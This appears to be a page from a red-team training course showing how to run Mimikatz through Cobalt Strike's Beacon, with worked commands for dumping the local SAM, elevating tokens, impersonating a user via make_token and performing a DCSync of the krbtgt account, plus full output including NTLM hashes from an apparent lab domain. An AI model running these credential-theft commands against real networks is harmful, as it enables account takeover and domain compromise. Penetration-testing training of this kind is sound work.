Mimikatz

Cobalt Strike has a built-in version of Mimikatz that we can use to extract various credential types. However, there are some differences with how it behaves in Beacon compared to the console version. Each time you execute Mimikatz in Beacon, it does so in a new temporary process which is then destroyed. This means you can't run two "related" commands, such as:

beacon> mimikatz token::elevate
beacon> mimikatz lsadump::sam

Since CS 4.8, you can chain multiple commands together by separating them with a semi-colon.

beacon> mimikatz token::elevate ; lsadump::sam

Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

552	{0;000003e7} 1 D 28330     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000d4499} 2 F 3234168   	DEV\bfarmer	S-1-5-21-569305411-121244042-2357301523-1104	(15g,24p)	Primary
 * Thread Token  : {0;000003e7} 1 D 3295086   	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
Domain : WKSTN-2
SysKey : b9dc7de8b1972237bbbd7f82d970f79a
Local SID : S-1-5-21-2281971671-4135076198-2136761646

SAMKey : b0664279732686cfbb4b788c078fea82

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: fc525c9683e8fe067095ba2ddc971889
    lm  - 0: 91b6e660bcac036ae7ab67a3d383bc82
    ntlm- 0: fc525c9683e8fe067095ba2ddc971889

Beacon also has its own command convention using the ! and @ symbols as "modifiers".

The ! elevates Beacon to SYSTEM before running the given command, which is useful in cases where you're running in high-integrity but need to impersonate SYSTEM. In most cases, ! is a direct replacement for token::elevate. For example:

beacon> mimikatz !lsadump::sam

The @ impersonates Beacon's thread token before running the given command, which is useful in cases where Mimikatz needs to interact with a remote system, such as with dcsync. This is also compatible with other impersonation primitives such as make_token and steal_token. For example:

beacon> getuid
[*] You are DEV\bfarmer

beacon> make_token DEV\nlamb F3rrari
[+] Impersonated DEV\nlamb (netonly)

beacon> mimikatz @lsadump::dcsync /user:DEV\krbtgt
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   : 
Password last change : 8/15/2022 4:01:04 PM
Object Security ID   : S-1-5-21-569305411-121244042-2357301523-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d
    ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d
    lm  - 0: 207d5e08551c51892309c0cf652c353b
PreviousTake ScreenshotNextNTLM Hashes

Last updated